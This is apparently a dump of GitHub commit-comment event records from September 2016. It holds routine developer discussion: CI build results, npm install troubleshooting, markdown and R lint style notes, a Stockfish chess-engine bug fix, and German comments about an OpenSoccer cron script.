{"id":"4561821972","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19018479,"position":null,"line":null,"path":null,"commit_id":"f2cb0a7d7b472e207e793378c97008000dcd701c","created_at":"2016-09-14T13:07:12Z","updated_at":"2016-09-14T13:07:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 998](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13262&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:28"}},"created_at":"2016-09-14T13:07:12Z"}
{"id":"4561822427","type":"CommitCommentEvent","actor":{"login":"aslubsky"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19018483,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T13:07:16Z","updated_at":"2016-09-14T13:07:16Z","body":"try remove package from node_modules and install it again. \r\nI've checked, after npm update all your changes in tslint.json was updated on local package"}},"created_at":"2016-09-14T13:07:16Z"}
{"id":"4561825168","type":"CommitCommentEvent","actor":{"login":"aslubsky"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19018491,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T13:07:48Z","updated_at":"2016-09-14T13:07:48Z","body":"also try \"ng2-select\": \"git+https://github.com/aslubsky/ng2-select.git\","}},"created_at":"2016-09-14T13:07:48Z"}
{"id":"4561825763","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018495,"position":61,"line":52,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T13:07:55Z","updated_at":"2016-09-14T13:07:55Z","body":"It looked messy to have a super long heading within the auto-generated sidebar, so I broke your longer headings into a short heading and a paragraph of text below it, throughout the entire syllabus. I think this formatting reads more clearly."}},"created_at":"2016-09-14T13:07:55Z"}
{"id":"4561827998","type":"CommitCommentEvent","actor":{"login":"nhoxwi"},"repo":{"name":"xbmc/Kore"},"payload":{"comment":{"id":19018503,"position":1,"line":65,"path":"app/src/main/java/org/xbmc/kore/Settings.java","commit_id":"6ab8b2b604c555ad2a50b4ed1e70d865581ff1be","created_at":"2016-09-14T13:08:19Z","updated_at":"2016-09-14T13:08:19Z","body":"bab"}},"created_at":"2016-09-14T13:08:19Z"}
{"id":"4561828539","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018505,"position":91,"line":76,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T13:08:24Z","updated_at":"2016-09-14T13:08:24Z","body":"Document sections should use h2 / `##` not h1, which is reserved for the page title."}},"created_at":"2016-09-14T13:08:24Z"}
{"id":"4561829164","type":"CommitCommentEvent","actor":{"login":"bep"},"repo":{"name":"digitalcraftsman/hugo-multilingual"},"payload":{"comment":{"id":19018507,"position":4,"line":14,"path":"content/about.de.md","commit_id":"0d4cbcb584cf52a70829b2cdaf5586f3b6cfa647","created_at":"2016-09-14T13:08:31Z","updated_at":"2016-09-14T13:08:31Z","body":"You have to move this before any map definition (see the TOML spec.)"}},"created_at":"2016-09-14T13:08:31Z"}
{"id":"4561833220","type":"CommitCommentEvent","actor":{"login":"hsurden"},"repo":{"name":"hsurden/us-constitution"},"payload":{"comment":{"id":19018519,"position":4,"line":3,"path":"README.md","commit_id":"2ac3d1d66361643e7a7af3ad862aa89d51c40045","created_at":"2016-09-14T13:09:20Z","updated_at":"2016-09-14T13:09:20Z","body":"(Update: Some time after I released this unofficial version, [Congress released an official version of the U.S. Constitution in xml - located here](https://github.com/usgpo/house-manual/blob/master/114/original-file-names/constitution.xml).  You may prefer that official version to this unofficial one)."}},"created_at":"2016-09-14T13:09:20Z"}
{"id":"4561834858","type":"CommitCommentEvent","actor":{"login":"lukasbestle"},"repo":{"name":"getkirby/toolkit"},"payload":{"comment":{"id":19018532,"position":null,"line":null,"path":null,"commit_id":"fba68a31896f93e9af284959af34204ff0657b5e","created_at":"2016-09-14T13:09:38Z","updated_at":"2016-09-14T13:09:38Z","body":"@bastianallgeier Could you please look into @ezraverheijen's comment? I don't really know why you changed it like that in October."}},"created_at":"2016-09-14T13:09:38Z"}
{"id":"4561841958","type":"CommitCommentEvent","actor":{"login":"dgmilanez"},"repo":{"name":"dgmilanez/temp-rio"},"payload":{"comment":{"id":19018550,"position":2,"line":2,"path":"README.txt","commit_id":"9edef372599f0373578ddf799b34e7601cf2e7ee","created_at":"2016-09-14T13:10:57Z","updated_at":"2016-09-14T13:10:57Z","body":"Gora sim..."}},"created_at":"2016-09-14T13:10:57Z"}
{"id":"4561847432","type":"CommitCommentEvent","actor":{"login":"bruno-serfe"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19018577,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T13:12:01Z","updated_at":"2016-09-14T13:12:01Z","body":"Hi @aslubsky Yes, that is what I'm doing \"ng2-select\": \"git+https://github.com/aslubsky/ng2-select.git\" but in my package.json with that code isn't work.. I don't know why, it says:\r\n\r\nsudo npm install git+https://github.com/aslubsky/ng2-select.git\r\nangular2-webpack-starter@5.0.5 /home/vagrant/code/Application\r\n├── ng2-select@1.0.1-beta.0  invalid (git+https://github.com/aslubsky/ng2-select.git#9762fb1362730ed258509dba58876363f01f9211)\r\n"}},"created_at":"2016-09-14T13:12:01Z"}
{"id":"4561847980","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018580,"position":128,"line":110,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T13:12:09Z","updated_at":"2016-09-14T13:12:09Z","body":"Markdown is specific about how lists are formatted. You need one dash and one space before each item. You also need to put an empty line between your list and whatever comes before and after.\r\n\r\nWorking list:\r\n```\r\nSome body text.\r\n\r\n- apple\r\n- orange\r\n- banana\r\n\r\nBack to our previously scheduled programming.\r\n```\r\n\r\nBroken list (as you had it):\r\n\r\n```\r\nSome body text.\r\n-apple\r\n-orange\r\n-banana\r\nBack to our previously scheduled programming.\r\n```"}},"created_at":"2016-09-14T13:12:09Z"}
{"id":"4561861469","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19018614,"position":null,"line":null,"path":null,"commit_id":"4d72913711c239234e2831fbc30629687aa8c399","created_at":"2016-09-14T13:14:46Z","updated_at":"2016-09-14T13:14:46Z","body":"Das ist kein genereller cronjob. Du kannst es einmalig ausführen, falls du\nmerkst das deine Computerteams nicht vollbesetzt sind.\n\nAm 14.09.2016 14:09 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> wann muss der cron starten und wie oft?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/4d72913711c239234e2831fbc30629687aa8c399#commitcomment-19017723>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZBP1_XH-5oJ2zklnlOrouuPco12Cks5qp-PtgaJpZM4J8syQ>\n> .\n>\n"}},"created_at":"2016-09-14T13:14:46Z"}
{"id":"4561862292","type":"CommitCommentEvent","actor":{"login":"Silverwolf90"},"repo":{"name":"tido/bust-cache"},"payload":{"comment":{"id":19018619,"position":null,"line":null,"path":null,"commit_id":"e785b5d5e212e2bacdd5849a5fcc43cde4df8879","created_at":"2016-09-14T13:14:57Z","updated_at":"2016-09-14T13:14:57Z","body":"flush*"}},"created_at":"2016-09-14T13:14:57Z"}
{"id":"4561863850","type":"CommitCommentEvent","actor":{"login":"Negodyaj"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19018624,"position":null,"line":null,"path":null,"commit_id":"f6559d67ce39964f8233792656fe2304e5970aab","created_at":"2016-09-14T13:15:18Z","updated_at":"2016-09-14T13:15:18Z","body":"now I see an exception in console:\r\nReferenceError: labelLength is not defined\r\n\r\nit's broken on this line:\r\nwidth: (labelLength > chart.chartHeight * 0.5 ? chart.chartHeight * 0.33 : chart.chartHeight) + PX"}},"created_at":"2016-09-14T13:15:18Z"}
{"id":"4561866548","type":"CommitCommentEvent","actor":{"login":"tram305"},"repo":{"name":"tram305/Springboard-"},"payload":{"comment":{"id":19018632,"position":null,"line":null,"path":null,"commit_id":"6d3ccc1aa6c0b00e35a26b02921d5d8f01e2457b","created_at":"2016-09-14T13:15:49Z","updated_at":"2016-09-14T13:15:49Z","body":"This includes two exercises on working with JSON and XML file"}},"created_at":"2016-09-14T13:15:49Z"}
{"id":"4561877540","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19018658,"position":null,"line":null,"path":null,"commit_id":"6311279d2a30d99de53f73de9ed6beb72f2d2dc9","created_at":"2016-09-14T13:17:50Z","updated_at":"2016-09-14T13:17:50Z","body":"[tests/testthat/test_mcmc_nltt.R:18:3:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L18) *style:* **Variable and function names should be all lowercase.**\n```r\n​  toFit <- function(params) {\n  ^~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:19:7:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(params[1] <= 0) return(1e6)\n      ^\n```\n[tests/testthat/test_mcmc_nltt.R:20:7:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(params[2] < 0) return(1e6)\n      ^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:21:7:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(params[1] > 100) return(1e6)\n      ^\n```\n[tests/testthat/test_mcmc_nltt.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    return(-1 * LL_BD( params, tree1) )\n                     ^\n```\n[tests/testthat/test_mcmc_nltt.R:22:7:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(params[2] > 100) return(1e6)\n      ^\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:26:33:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  ML <- optim(par = c(1, 0.001),fn = toFit)\n                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:26:38:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L26) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ML <- optim(par = c(1, 0.001),fn = toFit)\n                                     ^~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n^\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  \"mcmc_nltt: initial parameter values have to be above zero\"\n^\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L35) *style:* **lines should not be more than 80 characters.**\n```r\n​  expect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:73:28:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L73) *style:* **Commas should always have a space after.**\n```r\n​\t  mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:74:33:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                               ~^\n```\n[tests/testthat/test_mcmc_nltt.R:74:49:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:74:66:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:74:77:](https://github.com/richelbilderbeek/nLTT/blob/6311279d2a30d99de53f73de9ed6beb72f2d2dc9/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                           ~^~\n```"}},"created_at":"2016-09-14T13:17:50Z"}
{"id":"4561882819","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19018687,"position":null,"line":null,"path":null,"commit_id":"4d72913711c239234e2831fbc30629687aa8c399","created_at":"2016-09-14T13:18:47Z","updated_at":"2016-09-14T13:18:47Z","body":"ok. wie schaut es bei Teams aus die von einem Manager geführt wurden, der Manager aber das Team verlässt und die Verträge auslaufen. Team verliert die Spieler und hat aus der Folge heraus einen kleineren Kader da der Manager in der Zwischenzeit aus dem Spiel ist. Füllt der Computer das Team wieder auf oder muss dazu der Cron laufen?"}},"created_at":"2016-09-14T13:18:47Z"}
{"id":"4561883702","type":"CommitCommentEvent","actor":{"login":"wjzuo"},"repo":{"name":"wjzuo/wjzuo"},"payload":{"comment":{"id":19018690,"position":null,"line":null,"path":null,"commit_id":"2d2c35e19fc683c74575e948457df7d52a04a603","created_at":"2016-09-14T13:18:56Z","updated_at":"2016-09-14T13:18:56Z","body":"test"}},"created_at":"2016-09-14T13:18:56Z"}
{"id":"4561885875","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19018698,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T13:19:21Z","updated_at":"2016-09-14T13:19:21Z","body":"@snicolet @mcostalba  A correct implementation would be something like this\r\n\r\n```\r\nBitboard Position::slider_blockers(Bitboard sliders, Square s, Bitboard& pinners, Color pinnedsColor) const {\r\n\r\n  Bitboard b, result = 0;\r\n\r\n  // Snipers are sliders that attack 's' when a piece is removed\r\n  Bitboard snipers = (  (PseudoAttacks[ROOK  ][s] & pieces(QUEEN, ROOK))\r\n                 | (PseudoAttacks[BISHOP][s] & pieces(QUEEN, BISHOP))) & sliders;\r\n\r\n  while (snipers)\r\n  {\r\n       Square sniperSquare = pop_lsb(&snipers);\r\n       Bitboard b = between_bb(s, sniperSquare) & pieces();\r\n\r\n       if (b && !more_than_one(b)) {\r\n           result |= b;\r\n           if (color_of(piece_on(lsb(b))) == pinnedsColor)\r\n             pinners |= sniperSquare;\r\n       }\r\n  }\r\n  return result;\r\n}\r\n```\r\n\r\nwhere in  _pinnedsColor_ we pass the according color of pinned pieces we are looking for.\r\nUnfortunately I really doubt that such a bug-fix will pass any SPRT[-3,1], the overhead IMO is simply to big in contrast to the little increase in quality of recognizing dissolved pin situations properly. "}},"created_at":"2016-09-14T13:19:21Z"}
{"id":"4561888415","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19018706,"position":null,"line":null,"path":null,"commit_id":"7aff8923cc376f267370764ededd1b024452b62c","created_at":"2016-09-14T13:19:48Z","updated_at":"2016-09-14T13:19:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 999](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13266&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T13:19:48Z"}
{"id":"4561893966","type":"CommitCommentEvent","actor":{"login":"aslubsky"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19018715,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T13:20:49Z","updated_at":"2016-09-14T13:20:49Z","body":"try like this\r\n\r\n```mkdir /tmp/123```\r\n```cd /tmp/123```\r\n```echo \"{\r\n    \"name\": \"test\",\r\n    \"dependencies\": {\r\n        \"ng2-select\": \"git+https://github.com/aslubsky/ng2-select.git\"\r\n    }\r\n}\" > package.json```\r\n```npm install```\r\n\r\nshould output\r\n\r\n```test@ /tmp/123\r\n└── ng2-select@1.0.1-beta.0  (git+https://github.com/aslubsky/ng2-select.git#9762fb1362730ed258509dba58876363f01f9211)```\r\n```npm WARN test@ No description```\r\n```npm WARN test@ No repository field.```\r\n```npm WARN test@ No license field.```\r\n\r\n```ls -la```\r\n\r\nshould display\r\n\r\n```drwxrwxr-x  3 xxx  xxx   4096 вер 14 16:16 .```\r\n```drwxrwxrwt 23 root root 20480 вер 14 16:16 ..```\r\n```drwxrwxr-x  3 xxx  xxx   4096 вер 14 16:16 node_modules```\r\n```-rw-rw-r--  1 xxx  xxx    124 вер 14 16:16 package.json```"}},"created_at":"2016-09-14T13:20:49Z"}
{"id":"4561894278","type":"CommitCommentEvent","actor":{"login":"nirev"},"repo":{"name":"Xerpa/tenjin"},"payload":{"comment":{"id":19018717,"position":null,"line":null,"path":null,"commit_id":"9d91d674dfaefc3e2ca4e5fdd144114e4f6904d4","created_at":"2016-09-14T13:20:52Z","updated_at":"2016-09-14T13:20:52Z","body":"❤️ "}},"created_at":"2016-09-14T13:20:52Z"}
{"id":"4561895435","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":19018718,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-14T13:21:07Z","updated_at":"2016-09-14T13:21:07Z","body":"@Miigon 后来弄好了"}},"created_at":"2016-09-14T13:21:07Z"}
{"id":"4561897873","type":"CommitCommentEvent","actor":{"login":"x7177214"},"repo":{"name":"x7177214/homework0"},"payload":{"comment":{"id":19018726,"position":3,"line":12,"path":"README.md","commit_id":"5800e5ac17a7a917fd17337e260524a20c371b5e","created_at":"2016-09-14T13:21:32Z","updated_at":"2016-09-14T13:21:32Z","body":"132"}},"created_at":"2016-09-14T13:21:32Z"}
{"id":"4561905302","type":"CommitCommentEvent","actor":{"login":"hydra"},"repo":{"name":"cleanflight/cleanflight-web"},"payload":{"comment":{"id":19018741,"position":null,"line":null,"path":null,"commit_id":"ea42ed1922eefed97ba5b29f20f2f06a9220ca78","created_at":"2016-09-14T13:22:52Z","updated_at":"2016-09-14T13:22:52Z","body":"great to see some progress on this!"}},"created_at":"2016-09-14T13:22:52Z"}
{"id":"4561907321","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19018743,"position":null,"line":null,"path":null,"commit_id":"4d72913711c239234e2831fbc30629687aa8c399","created_at":"2016-09-14T13:23:15Z","updated_at":"2016-09-14T13:23:15Z","body":"Der Computer würde nach und nach die leeren Plätze durch Jugendspieler\nauffüllen.\n\nDa es aber nir alle 3 Tage einen gibt, kann das unterumständen sehr lange\ndauern. Durch das Script wird das Team sofort aufgefüllt.\n\nIn der Version von opensoccer2 ist dies nicht gewünscht. Wenn ihr das aber\nwollt  könnt ihr es als cronjob einmal am Tag laufen lassen. Mein Vorschlag\n2 oder 3 Uhr.\n\nAm 14.09.2016 15:18 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> ok. wie schaut es bei Teams aus die von einem Manager geführt wurden, der\n> Manager aber das Team verlässt und die Verträge auslaufen. Team verliert\n> die Spieler und hat aus der Folge heraus einen kleineren Kader da der\n> Manager in der Zwischenzeit aus dem Spiel ist. Füllt der Computer das Team\n> wieder auf oder muss dazu der Cron laufen?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/4d72913711c239234e2831fbc30629687aa8c399#commitcomment-19018687>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZDTEnv9ShQyrzbiieLihtjUaF1WWks5qp_Q3gaJpZM4J8syQ>\n> .\n>\n"}},"created_at":"2016-09-14T13:23:15Z"}
{"id":"4561908163","type":"CommitCommentEvent","actor":{"login":"ishmaelt3"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19018745,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T13:23:24Z","updated_at":"2016-09-14T13:23:24Z","body":"Thank you for the response:\r\n\r\nyes, all done, If  I run mysql query i can see that users were created  by the plugin.\r\n\r\n\r\nmysql> select firstname,last_login_on,created_on  from users;\r\n+-----------+---------------------+---------------------+\r\n| firstname | last_login_on       | created_on          |\r\n+-----------+---------------------+---------------------+\r\n| Ishmael   | 2016-09-14 14:43:35 | 2016-09-13 14:42:35 |\r\n| Kevin     | 2016-09-14 14:26:41 | 2016-09-14 14:26:18 |\r\n+-----------+---------------------+---------------------+\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-14T13:23:24Z"}
{"id":"4561912226","type":"CommitCommentEvent","actor":{"login":"mpflanzer"},"repo":{"name":"jrprice/Oclgrind"},"payload":{"comment":{"id":19018760,"position":100,"line":2168,"path":"src/core/WorkItemBuiltins.cpp","commit_id":"0f6eb40ddb0c5c88a0b33ee885eec35e578f525d","created_at":"2016-09-14T13:24:08Z","updated_at":"2016-09-14T13:24:08Z","body":"I guess this was pushed by accident? ;-)"}},"created_at":"2016-09-14T13:24:08Z"}
{"id":"4561914389","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19018764,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T13:24:30Z","updated_at":"2016-09-14T13:24:30Z","body":"On Wed, Sep 14, 2016 at 3:19 PM, pb00068 <notifications@github.com> wrote:\n\n> Unfortunately I really doubt that such a bug-fix will pass any SPRT[-3,1],\n> the overhead IMO is simply to big in contrast to the little increase in\n> quality of recognizing dissolved pin situations properly.\n>\n>\n>\nMaybe not, the inner 'if' condition is tested only in very rare cases, you\ncan do a dbg_hit_on() to verify, but I guess SPRT[-3,1] is not so clear and\ncould even be surprising, I'd suggest to try.\n"}},"created_at":"2016-09-14T13:24:30Z"}
{"id":"4561919684","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19018779,"position":null,"line":null,"path":null,"commit_id":"f95530fed5ccc83d873b36b41c5d56a9c87f9e52","created_at":"2016-09-14T13:25:27Z","updated_at":"2016-09-14T13:25:27Z","body":"[tests/testthat/test_mcmc_nltt.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n^\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  \"mcmc_nltt: initial parameter values have to be above zero\"\n^\n```\n[tests/testthat/test_mcmc_nltt.R:30:60:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         iterations = 10000, burnin = 1000, \n                                                           